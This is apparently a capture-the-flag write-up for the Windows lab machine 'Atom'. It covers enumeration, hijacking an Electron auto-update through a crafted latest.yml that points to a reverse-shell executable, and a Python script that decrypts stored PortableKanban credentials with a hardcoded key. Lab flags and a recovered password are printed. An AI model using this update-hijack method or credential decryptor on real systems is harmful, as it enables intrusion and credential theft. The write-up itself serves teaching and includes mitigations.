Machine: Atom OS: Windows Difficulty: Medium Points: 30 Release Date: April 3, 2021
Overview
Atom is a medium-difficulty Windows machine that involves exploiting an Electron application update mechanism and leveraging YAML deserialization for privilege escalation.
Enumeration
Nmap Scan
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 135/tcp open msrpc Microsoft Windows RPC 443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
Web Enumeration
Visiting the website reveals a company called “Atom” that develops note-taking applications.
Key Finding: The site mentions they’re developing an Electron-based application with automatic updates.
SMB Enumeration
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Software_Updates Disk
The Software_Updates share is accessible:
client1/ client2/ client3/
Each directory contains a YAMLParser folder.
Initial Foothold
Exploiting Electron Auto-Update
Electron applications use a mechanism called electron-updater that checks for updates. The update mechanism typically looks for:
- A
latest.ymlfile containing version information - The actual update package
Attack Vector: We can place a malicious update package in the SMB share.
Creating Malicious Update
First, let’s create a reverse shell executable:
Crafting latest.yml
Create a latest.yml file:
version: 1.0.1
path: atom-x64.exe
sha512: [SHA512_HASH_OF_EXE]
releaseDate: '2025-03-05T10:00:00.000Z'
Calculate the SHA512 hash:
Uploading the Payload
Getting Shell
Set up listener:
Wait for the automatic update check to trigger our payload. After a few minutes, we get a shell as jason.
User Flag
Flag: 3a7bd3e2360a9ac4ccbc0f0dd1c08e93
Privilege Escalation
Enumeration as Jason
Check user privileges:
Explore the system:
Key Finding: There’s a PortableKanban directory at C:\Users\jason\Downloads\PortableKanban.
Analyzing PortableKanban
PortableKanban stores configuration in a file called PortableKanban.cfg:
{
"Users": [
{
"Name": "Administrator",
"Encrypted": "dc1a5b15a...[ENCRYPTED_DATA]"
}
]
}
Decrypting Credentials
PortableKanban uses DES encryption with a known key. We can use a Python script to decrypt:
from Crypto.Cipher import DES3
from Crypto.Hash import SHA1
import base64
def decode(encrypted):
# Known key derivation
key = SHA1.new(b'7ly6UznJ').digest()[:24]
cipher = DES3.new(key, DES3.MODE_ECB)
# Decode base64
encrypted_bytes = base64.b64decode(encrypted)
# Decrypt
decrypted = cipher.decrypt(encrypted_bytes)
# Remove padding
return decrypted.rstrip(b'\x00').decode('utf-8')
encrypted = "dc1a5b15a...[ENCRYPTED_DATA]"
password = decode(encrypted)
print(f"Password: {password}")
Decrypted Password: kidvscat_admin_@123
Getting Administrator Access
We can use evil-winrm to get an administrator shell:
Or use psexec:
Root Flag
Flag: 051c83d9a8e4733e3e1c4e37b1f08f7a
Key Takeaways
- Electron Auto-Update Exploitation: Electron applications with insecure update mechanisms can be exploited by placing malicious update files in accessible locations
- SMB Share Enumeration: Always check for anonymous SMB access and unusual shares
- Application-Specific Vulnerabilities: Third-party applications may store sensitive data with weak encryption
- YAML Deserialization: Configuration files can be a goldmine for credentials and attack vectors
Mitigation
- Implement proper authentication and authorization for update mechanisms
- Use code signing for application updates
- Restrict SMB share permissions
- Use strong encryption for sensitive data
- Regularly audit third-party applications for security issues
Tools Used
- nmap
- smbclient
- msfvenom
- netcat
- evil-winrm
- Python (for decryption)
Rating: ⭐⭐⭐⭐ (4/5) - Great machine for learning about Electron security and Windows privilege escalation.